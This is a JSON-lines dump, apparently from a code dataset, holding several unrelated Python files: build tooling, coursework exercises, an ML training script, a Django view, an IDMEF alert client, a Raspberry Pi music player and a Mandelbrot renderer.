{"seq_id":"275186173","text":"#!/usr/bin/env python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This script assists with converting from Bazel BUILD files to CMakeLists.txt.\n\nBazel BUILD files should, where possible, be written to use simple features\nthat can be directly evaluated and avoid more advanced features like\nvariables, list comprehensions, etc.\n\nGenerated CMake files will be similar in structure to their source BUILD\nfiles by using the functions in build_tools/cmake/ that imitate corresponding\nBazel rules (e.g. cc_library -> iree_cc_library.cmake).\n\nFor usage, see:\n  python3 build_tools/bazel_to_cmake/bazel_to_cmake.py --help\n\"\"\"\n# pylint: disable=missing-docstring\n\nimport argparse\nimport datetime\nimport os\nimport re\nimport sys\n\nimport bazel_to_cmake_converter\n\nrepo_root = None\n\nEDIT_BLOCKING_PATTERN = re.compile(\n    r\"bazel[\\s_]*to[\\s_]*cmake[\\s_]*:?[\\s_]*do[\\s_]*not[\\s_]*edit\",\n    flags=re.IGNORECASE)\n\n\ndef parse_arguments():\n  global repo_root\n\n  parser = argparse.ArgumentParser(\n      description=\"Bazel to CMake conversion helper.\")\n  parser.add_argument(\"--preview\",\n                      help=\"Prints results instead of writing files\",\n                      action=\"store_true\",\n                      default=False)\n  parser.add_argument(\n      \"--allow_partial_conversion\",\n      help=\"Generates partial files, ignoring errors during conversion\",\n      action=\"store_true\",\n      default=False)\n\n  # Specify only one of these (defaults to --root_dir=iree).\n  group = parser.add_mutually_exclusive_group()\n  group.add_argument(\"--dir\",\n                     help=\"Converts the BUILD file in the given directory\",\n                     default=None)\n  group.add_argument(\n      \"--root_dir\",\n      help=\"Converts all BUILD files under a root directory (defaults to iree/)\",\n      default=\"iree\")\n\n  args = parser.parse_args()\n\n  # --dir takes precedence over --root_dir.\n  # They are mutually exclusive, but the default value is still set.\n  if args.dir:\n    args.root_dir = None\n\n  return args\n\n\ndef setup_environment():\n  \"\"\"Sets up some environment globals.\"\"\"\n  global repo_root\n\n  # Determine the repository root (two dir-levels up).\n  repo_root = os.path.dirname(\n      os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n\ndef log(*args, **kwargs):\n  print(*args, **kwargs, file=sys.stderr)\n\n\ndef convert_directory_tree(root_directory_path, write_files,\n                           allow_partial_conversion):\n  log(f\"convert_directory_tree: {root_directory_path}\")\n  for root, _, _ in os.walk(root_directory_path):\n    convert_directory(root, write_files, allow_partial_conversion)\n\n\ndef convert_directory(directory_path, write_files, allow_partial_conversion):\n  if not os.path.isdir(directory_path):\n    raise FileNotFoundError(f\"Cannot find directory '{directory_path}'\")\n\n  skip_file_path = os.path.join(directory_path, \".skip_bazel_to_cmake\")\n  build_file_path = os.path.join(directory_path, \"BUILD\")\n  cmakelists_file_path = os.path.join(directory_path, \"CMakeLists.txt\")\n\n  if os.path.isfile(skip_file_path) or not os.path.isfile(build_file_path):\n    # No Bazel BUILD file in this directory or explicit skip.\n    return\n\n  global repo_root\n  rel_build_file_path = os.path.relpath(build_file_path, repo_root)\n  rel_cmakelists_file_path = os.path.relpath(cmakelists_file_path, repo_root)\n  log(f\"Converting {rel_build_file_path} to {rel_cmakelists_file_path}\")\n\n  cmake_file_exists = os.path.isfile(cmakelists_file_path)\n  copyright_line = f\"# Copyright {datetime.date.today().year} Google LLC\"\n  write_allowed = write_files\n  if cmake_file_exists:\n    with open(cmakelists_file_path) as f:\n      for i, line in enumerate(f):\n        if line.startswith(\"# Copyright\"):\n          copyright_line = line.rstrip()\n        if EDIT_BLOCKING_PATTERN.search(line):\n          log(f\"  {rel_cmakelists_file_path} already exists, and \"\n              f\"line {i + 1}: '{line.strip()}' prevents edits. \"\n              f\"Falling back to preview\")\n          write_allowed = False\n\n  if write_allowed:\n    # TODO(scotttodd): Attempt to merge instead of overwrite?\n    #   Existing CMakeLists.txt may have special logic that should be preserved\n    if cmake_file_exists:\n      log(f\"  {rel_cmakelists_file_path} already exists; overwriting\")\n    else:\n      log(f\"  {rel_cmakelists_file_path} does not exist yet; creating\")\n  log(\"\")\n\n  with open(build_file_path, \"rt\") as build_file:\n    build_file_code = compile(build_file.read(), build_file_path, \"exec\")\n  try:\n    converted_text = bazel_to_cmake_converter.convert_build_file(\n        build_file_code,\n        copyright_line,\n        allow_partial_conversion=allow_partial_conversion)\n    if write_allowed:\n      with open(cmakelists_file_path, \"wt\") as cmakelists_file:\n        cmakelists_file.write(converted_text)\n    else:\n      print(converted_text, end=\"\")\n  except (NameError, NotImplementedError) as e:\n    log(f\"Failed to convert {rel_build_file_path}.\", end=\" \")\n    log(\"Missing a rule handler in bazel_to_cmake.py?\")\n    log(f\"  Reason: `{type(e).__name__}: {e}`\")\n  except KeyError as e:\n    log(f\"Failed to convert {rel_build_file_path}.\", end=\" \")\n    log(\"Missing a conversion in bazel_to_cmake_targets.py?\")\n    log(f\"  Reason: `{type(e).__name__}: {e}`\")\n\n\ndef main(args):\n  \"\"\"Runs Bazel to CMake conversion.\"\"\"\n  global repo_root\n\n  write_files = not args.preview\n\n  if args.root_dir:\n    convert_directory_tree(os.path.join(repo_root, args.root_dir), write_files,\n                           args.allow_partial_conversion)\n  elif args.dir:\n    convert_directory(os.path.join(repo_root, args.dir), write_files,\n                      args.allow_partial_conversion)\n\n\nif __name__ == \"__main__\":\n  setup_environment()\n  main(parse_arguments())\n","sub_path":"build_tools/bazel_to_cmake/bazel_to_cmake.py","file_name":"bazel_to_cmake.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
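The EDIT_BLOCKING_PATTERN in the record above deliberately tolerates spacing and underscore variants of the do-not-edit marker; a quick standalone check (pattern copied from the record, sample lines invented):

import re

EDIT_BLOCKING_PATTERN = re.compile(
    r"bazel[\s_]*to[\s_]*cmake[\s_]*:?[\s_]*do[\s_]*not[\s_]*edit",
    flags=re.IGNORECASE)

for line in ("# bazel_to_cmake: DO NOT EDIT",
             "# Bazel to cmake do not edit",
             "# autogenerated file"):
    print(bool(EDIT_BLOCKING_PATTERN.search(line)), line)
# prints True, True, False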
{"seq_id":"33734508","text":"'''\nGiven a text file. Find the length of the\nlongest line.\n'''\ndef readFile(myFile: str) -> list:\n    '''The function opens and reads a file'''\n    with open(myFile, 'r') as f:\n        lines = f.readlines()\n        return lines\n\ndef long_line(lines: list) -> int:\n    '''Returns the length of the longest line'''\n    longest_string = ''\n    for elem in lines:\n        if len(elem) > len(longest_string):\n            longest_string = elem\n    return len(longest_string)\n\nif __name__ == \"__main__\":\n\n    myFile = 'F:\\\\IT_School\\\\nichipurenko\\\\Lesson_18_DZ_Nichipurenko_A.V\\\\Text5.txt'\n\n    lines = readFile(myFile)\n    print()\n    print(\"Result: \", long_line(lines),'\\n')","sub_path":"Lesson_18_DZ_Nichipurenko_A.V/Lesson_18_DZ_4_Nichipurenko_A.V.py","file_name":"Lesson_18_DZ_4_Nichipurenko_A.V.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"172871057","text":"import ezff\nfrom ezff.interfaces import gulp, qchem\nfrom ezff.utils.reaxff import reax_forcefield\n\n# Define ground truths\ngt_gs = qchem.read_structure('ground_truths/optCHOSx.out')\ngt_gs_atomic_charges = qchem.read_atomic_charges('ground_truths/optCHOSx.out')\n\ndef my_error_function(variable_values, template):\n\n    myrank = ezff.get_pool_rank()\n    path = str(myrank)\n\n    # Calculate Ground State Charges\n    md_gs_job = gulp.job(path = path)\n    md_gs_job.structure = gt_gs\n    md_gs_job.forcefield = ezff.generate_forcefield(template, variable_values, FFtype = 'reaxff')\n    md_gs_job.options['pbc'] = False\n    md_gs_job.options['relax_atoms'] = False\n    md_gs_job.options['relax_cell'] = False\n    md_gs_job.options['atomic_charges'] = True\n    # Run GULP calculation\n    md_gs_job.run()\n    # Read output from completed GULP job and clean-up\n    md_gs_atomic_charges = md_gs_job.read_atomic_charges()\n    md_gs_job.cleanup()\n\n    # Calculate error\n    charg_error = ezff.error_atomic_charges(MD=md_gs_atomic_charges, GT=gt_gs_atomic_charges)\n    return [charg_error]\n\n\n# Generate forcefield template and variable ranges\nFF = reax_forcefield('ffield')\nFF.make_template_qeq('S')\nFF.generate_templates()\n\n\nif __name__ == '__main__':\n\n    obj = ezff.FFParam(error_function = my_error_function, num_errors = 1)\n    obj.read_variable_bounds('param_ranges')\n    obj.read_forcefield_template('ff.template.generated')\n\n    obj.set_algorithm('randomsearch_so', population_size = 32)\n    obj.parameterize(num_epochs = 5)\n    obj.set_algorithm('ngopt_so', population_size = 32)\n    obj.parameterize(num_epochs = 5)\n","sub_path":"examples/reaxff-charge-gulp-serial/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
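For the longest-line exercise in the first record above, the built-in max with len as the key is the idiomatic shortcut; a sketch assuming the same Text5.txt file is readable from the working directory:

with open('Text5.txt', 'r') as f:
    lines = f.readlines()
# same result as long_line() above; default='' guards against an empty file
print(len(max(lines, key=len, default='')))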
config[\"trainer\"][\"batch_size\"])\n\n\n\t## Evaluation \n\ttest_input_fn_wrapper_estimator = test_input_fn_wrapper(data=data, config=config, train=False)\n\tresult = model.evaluate(input_fn=test_input_fn_wrapper_estimator)\n\tprint(\"result: {:.3f}\".format(result))\n\n\ndef preprocess_data(data, config, train):\n\t# Rescale images\n\tdata = data.map(lambda x, y: (tf.div(tf.cast(x, tf.float32), 255.0), y))\t\n\t# Resize images\n\tdata = data.map(lambda x, y: (tf.image.resize_images(x, [256, 256]), y))\n\t# One-hot the output\n\tdata = data.map(lambda x, y: (x, tf.one_hot(y, 10)))\n\n\tif train: \n\t\t# IF training, read a buffer and randomly shuffle it\n\t\tdata = data.shuffle(buffer_size=config[\"trainer\"][\"buffer_size\"])\n\t\t# Allow infinite reading of the data in training \n\t\tnum_repeat = None\n\telse:\n\t\t# if testing then don't shuffle the data \n\t\tnum_repeat = 1\n\n\t# Repeat the dataset the given number of times \n\tdata = data.repeat(num_repeat)\n\n\tif train: \n\t\tdata = data.batch(config[\"trainer\"][\"batch_size\"]) \t\t\n\telse:\n\t\tdata = data.batch(config[\"evaluation\"][\"batch_size\"])\n\n\t# Create an iterator for the dataset and the above modifications\n\titerator = data.make_one_shot_iterator()\n\t# Get the next batch of images and labels\n\timages_batch, labels_batch = iterator.get_next()\n\n\t# The input-function must return a dict wrapping the images\n\tx = {'image': images_batch}\n\ty = labels_batch \n\n\treturn (x, y)\t\n\n\ndef train_input_fn_wrapper(config, data):\n\tdef train_input_fn():\n\t\t# Extract train data\n\t\tX_train, y_train = data.X_train, data.y_train\n\t\t# Create tf.data.Dataset instance from numpy array\n\t\ttrain_dataset = tf.data.Dataset.from_tensor_slices((X_train, y_train))\n\n\t\t# preprocess data\n\t\tx, y = preprocess_data(train_dataset, config, train=True)\n\n\t\t# # # Rescale images\n\t\t# # train_dataset = train_dataset.map(lambda x, y: (tf.div(tf.cast(x, tf.float32), 255.0), y))\t\n\t\t# # # Resize images \n\t\t# # train_dataset = train_dataset.map(lambda x, y: (tf.image.resize_images(x, [256, 256]), y))\n\n\t\t# # TODO : Add image augmentation functions\n\n\t\t# # Read a buffer and randomly shuffle it\n\t\t# train_dataset = train_dataset.shuffle(buffer_size=config[\"trainer\"][\"buffer_size\"])\n\t\t# # Allow infinite reading of the data in training \n\t\t# num_repeat = None \n\t\t# train_dataset = train_dataset.repeat(count=num_repeat)\n\t\t# # Get a batch of the given size\n\t\t# train_dataset = train_dataset.batch(config[\"trainer\"][\"batch_size\"])\n\t\t# # Create an iterator for the dataset and the above modifications\n\t\t# iterator = train_dataset.make_one_shot_iterator()\n\t\t# # Get the next batch of images and labels\n\t\t# images_batch, labels_batch = iterator.get_next()\n\n\t\t# # The input-function must return a dict wrapping the images\n\t\t# x = {'image': images_batch}\n\t\t# y = labels_batch \n\n\t\treturn (x, y)\t\t\n\n\t\"\"\" Wrap the train_input_fn because the estimator function does not accept\n\tany input arguments \"\"\"\n\treturn train_input_fn # return function call \n\n\n\ndef test_input_fn_wrapper(config, data):\n\tdef test_input_fn():\n\t\t# Extract train data\n\t\tX_test, y_test = data.X_test, data.y_test\n\t\t# Create tf.data.Dataset instance from numpy array\n\t\ttest_dataset = tf.data.Dataset.from_tensor_slices((X_test, y_test))\n\n\t\t# preprocess data\n\t\tx, y = preprocess_data(test_dataset, data, train=False)\n\n\t\treturn x, y\n\n\t\"\"\" Wrap the test_input_fn because the estimator 
function does not accept\n\tany input arguments \"\"\"\n\treturn test_input_fn # return function call\n\n\n# def model_fn()\n\nif __name__ == '__main__':\n\tlogging.basicConfig(level=logging.INFO, format='%(levelname)s:%(name)s: %(message)s')\n\n\tmain()","sub_path":"AlexNet/TensorFlow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"492869366","text":"# Candy Coding - (C) Ryan Kelley mr.kelley.teaches@gmail.com\n# Version 0.2a - 01/29/2017\n\n# The next line of code imports the function RANDINT from the RANDOM Python module. \nfrom random import randint # This allows us to generate random integers. \n\n\n# The next line of code DEFINES a FUNCTION. This function is named roll_d6. The emtpy () indicates this function takes no ARGUMENTS.\ndef roll_d6():\n die_roll = randint(1,6)\n print(\"You rolled a\",die_roll,\".\\n\")\n return die_roll # This function returns a random integer from 1 to 6. \n \n# The next line of code CALLS the function roll_d6. This causes the code to execute. \nroll_d6() \n\n# The next lines define the VARIABLES used in this program. The = tells Python to ASSIGN the VALUE on the right side to the variable on the left side of the = sign. \nchoc_kiss = 1\ngummy_bears = 1\nstar_b = 1\ncandy_type = 1\ncount = 1\n\nwhile count < 20:\n candy = roll_d6()\n if candy == 1:\n \n count +=1 \n elif candy == 2:\n gummy_bears += 1\n count += 1\n elif candy == 3:\n m_mallow += 1\n count += 2\n elif candy == 4:\n star_b += 1\n count +=3\n elif candy == 5:\n swedish_fish += 1\n gummy_bears += 1\n m_mallow += 2\n star_b += 1\n count += 4\n else:\n swedish_fish -= 1\n gummy_bears -= 1\n m_mallow -= 1\n star_b -= 1\n count -= 1\n\nprint(\"You should have\", swedish_fish, \"Swedish Fish.\")\nprint(\"You should have\", gummy_bears, \"Gummi Bears.\")\nprint(\"You should have\", star_b, \"Star Bursts.\")\nprint(\"You should have\", m_mallow, \"marshmallows.\")\n\n# Now for the fun stuff!\n\nmnm = 0\n\nif swedish_fish > 3:\n print(\"Woof. Woof.\") # You must bark like a dog.\n mnm += 2\nelse:\n print(\"Cluck. Cluck.\") # You must cluck like a chicken.\n mnm += 1\n\nif gummy_bears != 4:\n print(\"Stand up on one leg and touch your nose for 10 seconds.\") # Don't be shy.\n mnm += 2\nelse:\n print(\"You have four Gummy Bears! Eat one now.\") # Tasty.\n mnm += 1\n \nif star_b > 0:\n print(\"I have a nice collection of Star Bursts!\") # Say this out loud. SAY IT! \n mnm += 1\nelse:\n print(\"Look on the bright side: you didn't get any yellow ones!\") # \n mnm += 5\n\nif m_mallow % 2 == 0:\n print(\"Even Steven!\") # Who's Steven?\n mnm += 2\nelse:\n print(\"Odd Todd!\") # Wait, what happened to Steven?\n mnm += 3\n\nprint(\"You should have\", mnm, \"M&M's.\") \n\n\n \n\n\n","sub_path":"python/candy_coding_0.2a.py","file_name":"candy_coding_0.2a.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"333411400","text":"\"\"\"\ninput: bad, adb (alpha characters)\noutput: they are the same\n\nsolution: hash\n1. no duplicated char:\nuse a bitmap as hash\n2. 
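The input-fn wrappers in the TensorFlow record above exist because Estimator.train expects a zero-argument callable; the underlying closure trick is plain Python and can be sketched without TensorFlow (names here are illustrative, not from any framework):

def make_input_fn(config, data):
    def input_fn():
        # config and data are captured from the enclosing scope
        return {'image': data}, config['label']
    return input_fn

fn = make_input_fn({'label': 1}, data=[0.1, 0.2])
print(fn())   # ({'image': [0.1, 0.2]}, 1)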
{"seq_id":"333411400","text":"\"\"\"\ninput: bad, adb (alpha characters)\noutput: they are the same\n\nsolution: hash\n1. no duplicated char:\nuse a bitmap as hash\n2. duplicated char:\nuse an array as hash\n\"\"\"\n\n\ndef no_duplicated_str(s1, s2):\n    def f(x): return ord(x) - ord(\"A\")\n    has = 0\n    for c in s1:\n        has |= 1 << f(c)\n    for c in s2:\n        has ^= 1 << f(c)\n    if has != 0:\n        return False\n    return True\n\n\ndef duplicated_str(s1, s2):\n    # uppercase letters map to slots 0-25, lowercase letters to 26-51\n    def f(x): return (ord(x) - ord(\"A\")) if x <= \"Z\" else (ord(x) - ord(\"a\") + 26)\n    s = [0 for _ in range(52)]\n    for c in s1:\n        s[f(c)] += 1\n    for c in s2:\n        s[f(c)] -= 1\n    for i in s:\n        if i != 0:\n            return False\n    return True\n\n\ndef main():\n    s1 = \"ABCDabcd\"\n    s2 = \"aABCbcdD\"\n    if no_duplicated_str(s1, s2):\n        print(\"right1\")\n    s1 = \"aaabbbcccdddAAA\"\n    s2 = \"AAAabcabcabcddd\"\n    if duplicated_str(s1, s2):\n        print(\"right2\")\n    s1 = \"abcde\"\n    s2 = \"abcd\"\n    if not no_duplicated_str(s1, s2):\n        print(\"right3\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"learning-algorithm-book/1/1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"599814260","text":"from resources.models.resource import Resource\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\n\nfrom respa_o365.o365_calendar import MicrosoftApi, O365Calendar\nfrom respa_o365.o365_notifications import O365Notifications\nfrom respa_o365.serializers import OutlookCalendarLinkSerializer\nfrom respa_o365.models import OutlookCalendarLink, OutlookCalendarReservation\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom resources.api.reservation import UserFilterBackend\n\nclass OutlookCalendarLinkViewSet(viewsets.ModelViewSet):\n    queryset = OutlookCalendarLink.objects.none()\n    serializer_class = OutlookCalendarLinkSerializer\n    filter_backends = [UserFilterBackend]\n\n    def get_queryset(self):\n        if self.request.user.is_anonymous:\n            return OutlookCalendarLink.objects.none()\n\n        if self.request and self.request.user:\n            if self.request.user.is_superuser:\n                queryset = OutlookCalendarLink.objects.all()\n            else:\n                queryset = OutlookCalendarLink.objects.all().filter(user=self.request.user)\n\n            resource_id = self.request.query_params.get('resource_id', None)\n            if resource_id is not None:\n                queryset = queryset.filter(resource=resource_id)\n\n            return queryset\n        return OutlookCalendarLink.objects.none()\n\n    def list(self, request, *args, **kwargs):\n        resource_id = request.query_params.get('resource_id', None)\n        if resource_id is None:\n            return super().list(request, *args, **kwargs)\n\n        queryset = self.filter_queryset(self.get_queryset())\n        serializer = self.get_serializer(queryset, many=True)\n\n        try:\n            resource = Resource.objects.get(pk=resource_id)\n            link_exists = False\n            has_permission = resource.is_manager(request.user) or resource.is_admin(request.user)\n            if has_permission:\n                link_exists = OutlookCalendarLink.objects.all().filter(resource=resource_id).exists()\n            can_create = has_permission and not link_exists\n        except:\n            can_create = False\n\n        data = {\n            'results': serializer.data,\n            'can_create': can_create\n        }\n\n        return Response(data)\n","sub_path":"respa_o365/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
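The corrected index function above maps A-Z to slots 0-25 and a-z to 26-51 (the original compared the literals "Z" >= "x", which is always false, so every character fell into the lowercase branch); a quick check of the mapping:

def f(x):
    # uppercase letters occupy slots 0-25, lowercase letters 26-51
    return (ord(x) - ord("A")) if x <= "Z" else (ord(x) - ord("a") + 26)

print(f("A"), f("Z"), f("a"), f("z"))   # 0 25 26 51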
{"seq_id":"33546723","text":"# Copyright (C) 2021 CS GROUP - France. All Rights Reserved.\n# SPDX-License-Identifier: BSD-2-Clause\n\nimport uuid\nfrom datetime import datetime\nfrom idmefv2 import Message\nfrom idmefv2_transport import get_transport\nfrom args import parse_args\n\n\ndef main(args):\n    print(\"READY\", flush=True)\n\n    now = datetime.now().isoformat('T')\n    msg = Message()\n    msg['Version'] = '2.0.3'\n    msg['ID'] = str(uuid.uuid4())\n    msg['CreateTime'] = now\n    msg['StartTime'] = now\n    msg['Category'] = ['Attempt.Login']\n    msg['Description'] = 'Someone tried to login as root from 12.34.56.78 '\\\n        'port 1806 using the password method'\n    msg['Severity'] = 'Medium'\n    msg['Analyzer'] = {\n        'IP': '127.0.0.1',\n        'Name': 'prelude-lml',\n        'Model': 'My Log Analyzer v0.0.1',\n        'Category': ['LOG'],\n        'Data': ['Log'],\n        'Method': ['Signature'],\n    }\n    msg['Source'] = [\n        {\n            'IP': '12.34.56.78',\n            'Port': [1806],\n        }\n    ]\n    msg['Target'] = [\n        {\n            'IP': '23.34.45.56',\n            'Port': [22],\n            'Service': 'sshd',\n        }\n    ]\n\n    transport = get_transport('file://%s' % args.tmpdir, content_type=args.mime)\n    transport.start()\n    transport.send_message(msg)\n    transport.stop()\n\n\nif __name__ == '__main__':\n    args = parse_args(\"client\")\n    main(args)\n","sub_path":"examples/file/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"339298384","text":"#!/usr/bin/python3.7\nimport json\nimport os\nimport subprocess\nfrom pathlib import Path\n\nimport userinput\nfrom playsong import PlaySong\nfrom speaktext import speak_text\n\n\n# todo: make sure stereo channels working\n\nclass PiPlayer:\n\tMUSIC_PATH = \"/home/pi/Music/Dynamix\"\n\t# MUSIC_PATH = r\"/media/pi/Moms Eh/Music/Dynamix\"\n\tSTATE_FILE_PATH = os.path.join(Path(__file__).resolve().parent, \"state.json\")\n\tVOLUME_CHANGE_DELTA = 5\n\n\tdef __init__(self):\n\t\tself.album_num = 0\n\t\tself.track_num = 0\n\t\tself.album_list = []\n\t\tself.volume_percent = self._get_curr_vol_percent()\n\t\tself.play_song_thread = None\n\t\tself._build_album_list()\n\t\tself._read_last_playback_state()\n\n\tdef _build_album_list(self):\n\t\tfor dirpath, dirnames, filenames in os.walk(PiPlayer.MUSIC_PATH):\n\t\t\tif len(filenames) == 0:\n\t\t\t\tcontinue\n\t\t\talbum = []\n\t\t\tfor filename in filenames:\n\t\t\t\talbum.append(os.path.join(dirpath, filename))\n\t\t\talbum.sort(key=lambda path: path.split(\"/\")[-1])\n\t\t\tself.album_list.append(album)\n\t\tself.album_list.sort(key=lambda album: album[0].split(\"/\")[-2])\n\t\tif len(self.album_list) == 0:\n\t\t\traise Exception(\"No audio found at path: \" + PiPlayer.MUSIC_PATH)\n\n\tdef _get_curr_vol_percent(self):\n\t\tGET_VOL_CMD = 'amixer -c 0 get Headphone | grep -oP \"\\\\[\\\\d*%\\\\]\" | sed s:[][%]::g'\n\t\treturn int(subprocess.getoutput(GET_VOL_CMD))\n\n\tdef _read_last_playback_state(self):\n\t\tif os.path.isfile(PiPlayer.STATE_FILE_PATH):\n\t\t\twith open(PiPlayer.STATE_FILE_PATH, 'r') as state:\n\t\t\t\t[self.album_num, self.track_num] = json.load(state)\n\t\t\t# in case the user deleted some albums/tracks since last state save, check that indexes are within range\n\t\t\tif self.album_num > len(self.album_list) - 1 or self.track_num > len(self.album_list[self.album_num]) - 1:\n\t\t\t\tself.album_num = 0\n\t\t\t\tself.track_num = 0\n\n\tdef _write_current_playback_state(self):\n\t\twith open(PiPlayer.STATE_FILE_PATH, 'w') as state:\n\t\t\tjson.dump([self.album_num, self.track_num], state)\n\n\tdef _speak_album_name(self):\n\t\tfull_path_split = self.album_list[self.album_num][self.track_num].split(\"/\")\n\t\talbum_name = full_path_split[-2]\n\t\tspeak_text(album_name)\n\n\tdef play_song_file(self, file_name):\n\t\tprint(\"now playing: album_num=\", self.album_num, \"track_num=\", self.track_num, file_name, flush=True)\n\t\tself._write_current_playback_state()\n\t\tself.play_song_thread = PlaySong(self, file_name)\n\t\tself.play_song_thread.start()\n\n\tdef play_new_song(self, song_index_changer):\n\t\tself.play_song_thread.user_stop()\n\t\tsong_index_changer()\n\t\tself.play_song_file(self.album_list[self.album_num][self.track_num])\n\n\tdef play_next_song(self):\n\t\tprint(\"next song\", flush=True)\n\t\tdef song_index_changer():\n\t\t\tif self.track_num < len(self.album_list[self.album_num]) - 1:\n\t\t\t\tself.track_num += 1\n\t\t\telse:\n\t\t\t\tself._increment_album_num()\n\t\tself.play_new_song(song_index_changer)\n\n\tdef play_previous_song(self):\n\t\tprint(\"previous song\", flush=True)\n\t\tdef song_index_changer():\n\t\t\tif self.track_num > 0:\n\t\t\t\tself.track_num -= 1\n\t\t\telse:\n\t\t\t\tself._decrement_album_num()\n\t\tself.play_new_song(song_index_changer)\n\n\tdef play_next_album(self):\n\t\tprint(\"next album\", flush=True)\n\t\tself.play_new_song(self._increment_album_num)\n\n\tdef play_previous_album(self):\n\t\tprint(\"previous album\", flush=True)\n\t\tself.play_new_song(self._decrement_album_num)\n\n\tdef _increment_album_num(self):\n\t\tif self.album_num < len(self.album_list) - 1:\n\t\t\tself.album_num += 1\n\t\telse:\n\t\t\tself.album_num = 0\n\t\tself.track_num = 0\n\t\tself._speak_album_name()\n\n\tdef _decrement_album_num(self):\n\t\tif self.album_num > 0:\n\t\t\tself.album_num -= 1\n\t\telse:\n\t\t\tself.album_num = len(self.album_list) - 1\n\t\tself.track_num = 0\n\t\tself._speak_album_name()\n\n\tdef volume_up(self):\n\t\tprint(\"volume up\", flush=True)\n\t\tself._set_volume_percent(PiPlayer.VOLUME_CHANGE_DELTA)\n\n\tdef volume_down(self):\n\t\tprint(\"volume down\", flush=True)\n\t\tself._set_volume_percent(-PiPlayer.VOLUME_CHANGE_DELTA)\n\n\tdef _set_volume_percent(self, delta):\n\t\tMAX_VOL_PERCENT = 100\n\t\tMIN_VOL_PERCENT = 0\n\t\tself.volume_percent += delta\n\t\tself.volume_percent = max(MIN_VOL_PERCENT, min(self.volume_percent, MAX_VOL_PERCENT))\n\t\tSET_VOL_CMD = [\"amixer\", \"-c\", \"0\", \"sset\", \"Headphone\", str(self.volume_percent) + \"%\"]\n\t\tself.song_play_pause()\n\t\tsubprocess.run(SET_VOL_CMD)\n\t\tspeak_text(str(self.volume_percent) + \" percent\")\n\t\tself.song_play_pause()\n\n\tdef song_play_pause(self):\n\t\tprint(\"play/pause\", flush=True)\n\t\tself.play_song_thread.user_play_pause()\n\n\tdef start(self, input_device):\n\t\tself.play_song_file(self.album_list[self.album_num][self.track_num])\n\t\twhile True:\n\t\t\tinput_device.wait_for_input(self)\n\n\tdef _print_current_state_debug(self):\n\t\tprint(\"album num:\", self.album_num)\n\t\tprint(\"track num:\", self.track_num)\n\t\tprint(\"vol percent:\", self.volume_percent)\n\t\tprint(\"play song thread:\", self.play_song_thread)\n\nif __name__ == \"__main__\":\n\tcontrol = userinput.IRRemoteControl()\n\tPiPlayer().start(control)\n","sub_path":"piplayer.py","file_name":"piplayer.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
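The album scan in the PiPlayer record above keeps one sorted track list per directory that actually contains files; the core os.walk pattern, stripped of the player specifics (the Music directory name is invented):

import os

albums = []
for dirpath, dirnames, filenames in os.walk('Music'):
    if filenames:
        # one album per non-empty directory, tracks sorted by file name
        albums.append(sorted(os.path.join(dirpath, f) for f in filenames))
albums.sort(key=lambda album: album[0])
print(len(albums), 'albums found')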
{"seq_id":"164496910","text":"from PIL import Image \n\nwidth, height = 480,360\ncanv = Image.new(\"HSV\", (width, height))\n\nzoom = 1.3\nlx, ly = 4, 3\ncx, cy = -0.761574,-0.0847596\nmax_iter = 50\nframes_count = 24\n\ndef calc_frac(x, y):\n    c = ((x/width - 0.5) * (lx/zoom) ,(y/height - 0.5) * (ly/zoom))\n    z = (0,0)\n    for i in range(max_iter):\n        z = (cx + z[0]**2 - z[1]**2 + c[0], cy + 2*z[0]*z[1] + c[1])\n        if(z[0] == 0 and z[1] == 0):\n            return (255,255,255)\n        elif(abs(z[0]) > 2 or abs(z[1]) > 2):\n            return (int(i/max_iter *255),0,0)\n    return (255,255,255)\n\nfor f in range(frames_count):\n    for i in range(height):\n        for j in range(width):\n            canv.putpixel((j,i), calc_frac(j,i))\n    zoom*=(1+(f+1)/3)\n    max_iter+=6\n    print(\"saving {} out of {}\".format(f, frames_count))\n    # PNG cannot store an HSV-mode image, so convert to RGB before saving\n    canv.convert(\"RGB\").save(\"othermandelbrot{}.png\".format(f))\n    #canv.show()\n","sub_path":"pillow_mandel/pillow_mandelbrot.py","file_name":"pillow_mandelbrot.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
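The per-pixel loop above is the classic escape-time iteration z -> z^2 + c written with coordinate pairs; with Python's complex type the same test collapses to a few lines (the sample point reuses the record's cx/cy centre):

def escape_time(c, max_iter=50):
    # iterate z -> z*z + c and report how quickly |z| exceeds 2, if ever
    z = 0j
    for i in range(max_iter):
        z = z * z + c
        if abs(z) > 2:
            return i
    return max_iter

print(escape_time(complex(-0.761574, -0.0847596)))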
